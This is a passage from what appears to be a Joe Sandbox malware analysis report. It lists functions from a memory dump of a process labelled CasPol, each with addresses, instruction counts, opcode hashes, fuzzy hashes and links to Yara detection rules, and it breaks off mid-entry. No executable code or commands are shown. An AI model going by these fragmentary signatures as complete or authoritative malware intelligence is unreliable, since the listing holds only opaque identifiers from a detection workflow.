                                                                                  • Opcode ID: 5eecc57d4c8511f53047bd07f473a7ad2ac09eb3a7272f25e884c7d228a22c7f
                                                                                  • Instruction ID: 78b71a38351ddb2913e9a1cba18f1a66554ecf12d35883aeb46241ab6ddea5e2
                                                                                  • Opcode Fuzzy Hash: 5eecc57d4c8511f53047bd07f473a7ad2ac09eb3a7272f25e884c7d228a22c7f
                                                                                  • Instruction Fuzzy Hash: 6651A635905328CFCBA5EF30D89868AB776BF49315F5081E9D80AA3354CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3D3FB8 Relevance: .1, Instructions: 121COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a3204d7317a10e65cbac1b51b2d086e5bb389666cd4f9d3bf08732220bb370af
                                                                                  • Instruction ID: d526629313faa709c0710b4454836662a95e903a669e04410d1aafb15e436315
                                                                                  • Opcode Fuzzy Hash: a3204d7317a10e65cbac1b51b2d086e5bb389666cd4f9d3bf08732220bb370af
                                                                                  • Instruction Fuzzy Hash: 6441CE353047008FC3449B39D498A6AB7E5EF8A640B5640B8E60ACF7A1DB71EC45CB96
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DEC6F Relevance: .1, Instructions: 116COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: d07fa2d77317f481d2653cc4bd10a8acf86bb1d7f335de2de660bee40c8822e9
                                                                                  • Instruction ID: b1e3e6a5d0831ea51892f4185145ba259e3da0f74aceece421f3a3c00cd013b2
                                                                                  • Opcode Fuzzy Hash: d07fa2d77317f481d2653cc4bd10a8acf86bb1d7f335de2de660bee40c8822e9
                                                                                  • Instruction Fuzzy Hash: C851B535901328CFCBA5EF30D89868AB776BF49315F5081E9D80AA3354CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DA650 Relevance: .1, Instructions: 115COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b6bc498113c77b506be90a4e469f11685210bc7cf87292ba70c6397f0fb8b20f
                                                                                  • Instruction ID: 95551e28c84dba84fa202dc150524074e3363ad2ec12abea89be510fa87a9811
                                                                                  • Opcode Fuzzy Hash: b6bc498113c77b506be90a4e469f11685210bc7cf87292ba70c6397f0fb8b20f
                                                                                  • Instruction Fuzzy Hash: 38411075B04710CFDB819BB0CA056AE77F1AF89204F5145A9C506EB3A0DB39CC42CFA6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DA660 Relevance: .1, Instructions: 114COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 30b35fd50124adbdd1b1c5f9c1ec84f0d20b25809cf3b0c7e176178197d45174
                                                                                  • Instruction ID: 79aa7dd0b9d24c30a01ab4c1bdd22a6e5666c9033b10791ef11237906325eb7e
                                                                                  • Opcode Fuzzy Hash: 30b35fd50124adbdd1b1c5f9c1ec84f0d20b25809cf3b0c7e176178197d45174
                                                                                  • Instruction Fuzzy Hash: 7441ED35B04711CFDB459BB4C9096AE77F2AF89204F514468D506EB3A0EB35DC42CFA6
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DECB9 Relevance: .1, Instructions: 109COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f4fce51e5950664dbb1f2eb4d1966257854e5b02c7a54482cfb4a0d4ca915544
                                                                                  • Instruction ID: dabb858171bce070953bde82bff3328643f7e29fcbdca3c5afbd1e72ef47e8d3
                                                                                  • Opcode Fuzzy Hash: f4fce51e5950664dbb1f2eb4d1966257854e5b02c7a54482cfb4a0d4ca915544
                                                                                  • Instruction Fuzzy Hash: 1251C635901328CFCBA5EF20D89868AB776BF49315F5081E9D90AA3354CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DED03 Relevance: .1, Instructions: 102COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b74dbb769ca3c193ed48207b86b5f908d57cb203b3caefa104dd3282ecc4af37
                                                                                  • Instruction ID: b34a800f4d24296d1e50f06d57ad7e337b7898e30c4bdddd8fb4c836c186336c
                                                                                  • Opcode Fuzzy Hash: b74dbb769ca3c193ed48207b86b5f908d57cb203b3caefa104dd3282ecc4af37
                                                                                  • Instruction Fuzzy Hash: 7B51DA35901328CFCBA5EF20D89868AB775BF4A315F5081E9D80BA3344CB359E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3D3870 Relevance: .1, Instructions: 95COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 34ada9869ceaef9aa9fe1f4d32e9b58312651000126b7c36762b29d61b433069
                                                                                  • Instruction ID: 94354128ccac4de48271dcad204aa1ebede3c45cebf3a6ab0f3f266ae9e33d4e
                                                                                  • Opcode Fuzzy Hash: 34ada9869ceaef9aa9fe1f4d32e9b58312651000126b7c36762b29d61b433069
                                                                                  • Instruction Fuzzy Hash: E531B235B04219DFDB028F94D88866E7BA2FB88210F948428F90697354CB74DCA1DF93
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3D1E99 Relevance: .1, Instructions: 93COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ddf2c2f6f82793fb12dfef99589b3bb2c8b65105e8f1ea696fbf11799bae74ec
                                                                                  • Instruction ID: d2924466e4e94abe7d35c0af4e6d921570f81a2471440d740a4c041795fe5dc2
                                                                                  • Opcode Fuzzy Hash: ddf2c2f6f82793fb12dfef99589b3bb2c8b65105e8f1ea696fbf11799bae74ec
                                                                                  • Instruction Fuzzy Hash: 4E415C3446A2A6CED701DB74E4CF74E3B75FB5734CF058A54C0888A16ADBB4858A8BA1
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DED63 Relevance: .1, Instructions: 91COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: da7d76396c5962f4a4be3cd4d030175a5872e314e6060fc972aabd26690f5a7d
                                                                                  • Instruction ID: 0595a8d862ed00080200f802852bb3303a1dd129e294136436d74c7662f37ec5
                                                                                  • Opcode Fuzzy Hash: da7d76396c5962f4a4be3cd4d030175a5872e314e6060fc972aabd26690f5a7d
                                                                                  • Instruction Fuzzy Hash: AD41B735901328CFCBA5EF20D89868AB775BF4A315F5081E9D84AA3354CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3D6EE8 Relevance: .1, Instructions: 90COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 7c2e778aa6457f1c77b11ae1dafc7f45e1212f218d485171e4ad0abe9edbab85
                                                                                  • Instruction ID: 44ffdbabd4626f3c8b1a1a87e8e19094eea591f040cbbbbab4756e8adc277beb
                                                                                  • Opcode Fuzzy Hash: 7c2e778aa6457f1c77b11ae1dafc7f45e1212f218d485171e4ad0abe9edbab85
                                                                                  • Instruction Fuzzy Hash: 4331B132B00A18CFCB81DBB4C5186AD37F9EF49645B2145A8D10ADB361EB32DC46DF86
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3D1EA8 Relevance: .1, Instructions: 88COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 95b92d41c744dc83b8224c858fc71c78dcaef9dfcf30343698fcbeaaf3e2fe0d
                                                                                  • Instruction ID: 1da93ca920ab22e33c13e83e966b64c6d55d7959327799bf5fa4430c256d026a
                                                                                  • Opcode Fuzzy Hash: 95b92d41c744dc83b8224c858fc71c78dcaef9dfcf30343698fcbeaaf3e2fe0d
                                                                                  • Instruction Fuzzy Hash: B5415E304692A6CFD300DB74E4CF74E3B75FB5734CF058654D0888A16ADBB4D18A8BA5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DD4B8 Relevance: .1, Instructions: 84COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: dadbabf3a314fba761eff51888a7fb320efcd2691d365e94abf4231208cb07db
                                                                                  • Instruction ID: 1bfd5a40f5353a82da74e8e50c6b2882266ac5e444dbe3bf795f67e5002a5add
                                                                                  • Opcode Fuzzy Hash: dadbabf3a314fba761eff51888a7fb320efcd2691d365e94abf4231208cb07db
                                                                                  • Instruction Fuzzy Hash: FE2126366047A10BDB60952DA49633D3697DF83218FA10A3AE04FCB690D794DC888B93
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3D31E8 Relevance: .1, Instructions: 84COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 641429207cc0e0945555440fd28c3c670bcd60e42532ad4a790ba7c804ca8de4
                                                                                  • Instruction ID: dcb208d59f6995e7db9ca67fa363c2c0f008bd40881eea233c0bd7f01e67d14c
                                                                                  • Opcode Fuzzy Hash: 641429207cc0e0945555440fd28c3c670bcd60e42532ad4a790ba7c804ca8de4
                                                                                  • Instruction Fuzzy Hash: E7216832B087658BC707537895253AE37A65FC4544F46C9AAC686CB395EF24CC0947A3
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DEDAD Relevance: .1, Instructions: 82COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b15a5d5ec5cf629d3910420bb770b155426da7a5999f9a999a6ab6a7477828ca
                                                                                  • Instruction ID: 3984184b9b5270b910316b054f261b6c9fbd37d2c7b476c9fa22d6c37d25cd7f
                                                                                  • Opcode Fuzzy Hash: b15a5d5ec5cf629d3910420bb770b155426da7a5999f9a999a6ab6a7477828ca
                                                                                  • Instruction Fuzzy Hash: 1741C935901328CFCBA5EF20D89868AB775BF4A315F5081E9D80AA3354CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DD4C8 Relevance: .1, Instructions: 79COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b8a87c9213928a88afedb9802495eaaf0c5da8879f42a6f260096a249137cd3d
                                                                                  • Instruction ID: 8a130811bd45aa0e0f65fa6691125be0477a7ce881f208f3b13a6ba4f25e53d1
                                                                                  • Opcode Fuzzy Hash: b8a87c9213928a88afedb9802495eaaf0c5da8879f42a6f260096a249137cd3d
                                                                                  • Instruction Fuzzy Hash: 70210A366007614BDB64552DA49633D7697DF82218FA10F3AE04FCB790D794DC848F93
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DEDEB Relevance: .1, Instructions: 77COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 80eb1f4db14f5fb27f6771c748f944d5ab70cd12a0c02be78aa737c6bd48ba40
                                                                                  • Instruction ID: d124a1346ec8e005e92f333ee17f1cd55449d69e63bd0e8d519458b70a6f1beb
                                                                                  • Opcode Fuzzy Hash: 80eb1f4db14f5fb27f6771c748f944d5ab70cd12a0c02be78aa737c6bd48ba40
                                                                                  • Instruction Fuzzy Hash: 6141DA35901328CFCB65EF20D89868AB775FF4A315F5081E9D84AA3344CB369E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3D1075 Relevance: .1, Instructions: 73COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b6abf081f2140893b6b567e5629afcac05a94a929f26ca72b84a82f8da93fc42
                                                                                  • Instruction ID: 5100b49299921651bfe1c2adfdcdcce6bc98ccb4c53320074a2b51e6823ae075
                                                                                  • Opcode Fuzzy Hash: b6abf081f2140893b6b567e5629afcac05a94a929f26ca72b84a82f8da93fc42
                                                                                  • Instruction Fuzzy Hash: 5921CF36E087518FCF819FB4C5850EDBFF1AF4A244716816AD505E7252DB30DC82CBA2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DEE35 Relevance: .1, Instructions: 70COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 5a44a1b02c7416c1128d0b46cb820feacfb617bafcb2a10e84cbbf77518525ac
                                                                                  • Instruction ID: edd6bd8a301e523dc0c41e02a3c1825a0ac06f80c32fb2525a994fea5b85e2b5
                                                                                  • Opcode Fuzzy Hash: 5a44a1b02c7416c1128d0b46cb820feacfb617bafcb2a10e84cbbf77518525ac
                                                                                  • Instruction Fuzzy Hash: B031D835900328CFCB65EF20D89868AB779BF4A315F5081E9D94AA3344CB359E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3D3860 Relevance: .1, Instructions: 66COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 758ea79e44bfe3fe33234ae805a3bf0c233bd6457e3196c79f1ab806c901ff81
                                                                                  • Instruction ID: 575c389bd5b47dae44cf6b5e3f536f81a88d7f203e69a2e10f7530d142f55526
                                                                                  • Opcode Fuzzy Hash: 758ea79e44bfe3fe33234ae805a3bf0c233bd6457e3196c79f1ab806c901ff81
                                                                                  • Instruction Fuzzy Hash: DC21D132A083599FD7028F64D85876E3BA1EB45210F948129E8098B355CB34CCA4DFA3
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DEE7F Relevance: .1, Instructions: 63COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a163e42d76ae343bb4c0ca347632c2b31f82628f1f02743a2c431884725cca13
                                                                                  • Instruction ID: 38f6a5338fd0ee6c2ca3ad36d57b03d4a21450d89c4a0b2e71427e16f7be6678
                                                                                  • Opcode Fuzzy Hash: a163e42d76ae343bb4c0ca347632c2b31f82628f1f02743a2c431884725cca13
                                                                                  • Instruction Fuzzy Hash: 1A31FB35A01328CFCBA5EF20D898689B779FF4A315F5080E9D84AA3344CB359E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3D31D9 Relevance: .1, Instructions: 62COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 52f0df23ed51f0e66bc045176eaaab6f6e15d86ec1960181d7ec3fe223ec8aec
                                                                                  • Instruction ID: c90818c9888cf311604eea751a45dfca62a3cf3e8919e0f2c0eedf462d55544c
                                                                                  • Opcode Fuzzy Hash: 52f0df23ed51f0e66bc045176eaaab6f6e15d86ec1960181d7ec3fe223ec8aec
                                                                                  • Instruction Fuzzy Hash: 9B116B36B093914BDB034368DD156E93BA2DFC5210F4989A6C5C5DB286DB20CC4A8B93
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3D2B97 Relevance: .1, Instructions: 60COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: eee63149135b59ac71b7b01128074f1c5f58c97bc0a85d0968f7b760aa116dd9
                                                                                  • Instruction ID: 39911dce5634755aac3c8fa560de8a70e7a11c69142b98302888318d3f193802
                                                                                  • Opcode Fuzzy Hash: eee63149135b59ac71b7b01128074f1c5f58c97bc0a85d0968f7b760aa116dd9
                                                                                  • Instruction Fuzzy Hash: 03118279B003609FCB416BB8848D35D7AF5AF891917144929E946D3344EF34C9868B96
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DEEC9 Relevance: .1, Instructions: 56COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6f8e1010f89c699c5d222521273b818c210dadc879877a5ca79f2c6eaa44ff2e
                                                                                  • Instruction ID: da2c5da8d3f944190c647ef088f7c613196e02e99336abb70c09fbe03a08d3fd
                                                                                  • Opcode Fuzzy Hash: 6f8e1010f89c699c5d222521273b818c210dadc879877a5ca79f2c6eaa44ff2e
                                                                                  • Instruction Fuzzy Hash: 9921EB35A00328CFCB65EF60D898689B7B9FF4A315F5081E9D44AA3354CB359E85CF16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3D2BA8 Relevance: .1, Instructions: 55COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 87de7db24aead93767a95dd6dbe0dc8fd52b072e0d2eca9def7946c37b01371f
                                                                                  • Instruction ID: 54f02440e170a70ab2a65628e43734dbb7599f5f3817447a23be986e4e226a1a
                                                                                  • Opcode Fuzzy Hash: 87de7db24aead93767a95dd6dbe0dc8fd52b072e0d2eca9def7946c37b01371f
                                                                                  • Instruction Fuzzy Hash: 6D118279F003209FCB406BB8848C35E7AF5AF882A1B504929E906D3344EF34D9828B96
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3D2800 Relevance: .0, Instructions: 50COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 219b2c5d2be392c1bb75ca517cc5e03903bb6747e678198b94916c1e8afcaf5b
                                                                                  • Instruction ID: ba9844a5dad953cb4ed32463517846e789ca7d4ef7a68b95b51831fd30b660db
                                                                                  • Opcode Fuzzy Hash: 219b2c5d2be392c1bb75ca517cc5e03903bb6747e678198b94916c1e8afcaf5b
                                                                                  • Instruction Fuzzy Hash: 7301D236626231CFCB01ABB0D48E6ED3BB5BF861593054A95D149CB251EF34C88ACB99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DEF13 Relevance: .0, Instructions: 49COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3584c106c9ec7b1506ab46353b347b830703ddc66923718aa758235268a3008b
                                                                                  • Instruction ID: cd11797c7ae26844fa51a723becad6e2f25cc7174c538c3b0b92c3bd01b5f369
                                                                                  • Opcode Fuzzy Hash: 3584c106c9ec7b1506ab46353b347b830703ddc66923718aa758235268a3008b
                                                                                  • Instruction Fuzzy Hash: 94210635A00328CFCB65EF60D89868AB779FF4A315F5081E9D84AA3340CB319E85CF06
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3DEF5D Relevance: .0, Instructions: 42COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 75547147df15688183c73b6b09d2974f3ea416ea294ed37d95e21b934d2c4e81
                                                                                  • Instruction ID: 385c07eb0da62a11def5af402f060c5cfe12499e2b2240b6f46433f040850039
                                                                                  • Opcode Fuzzy Hash: 75547147df15688183c73b6b09d2974f3ea416ea294ed37d95e21b934d2c4e81
                                                                                  • Instruction Fuzzy Hash: 3611D235A00328CFCB65EF60D89868AB779FF46305F5081EAD94AA3340CB319E85CF42
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 1D3D2070 Relevance: .0, Instructions: 40COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.28074260735.000000001D3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D3D0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_1d3d0000_CasPol.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ca15b753e28b8432ce671ff25814f13c948caf61a21a5d5eca6f2e524fab5d9b
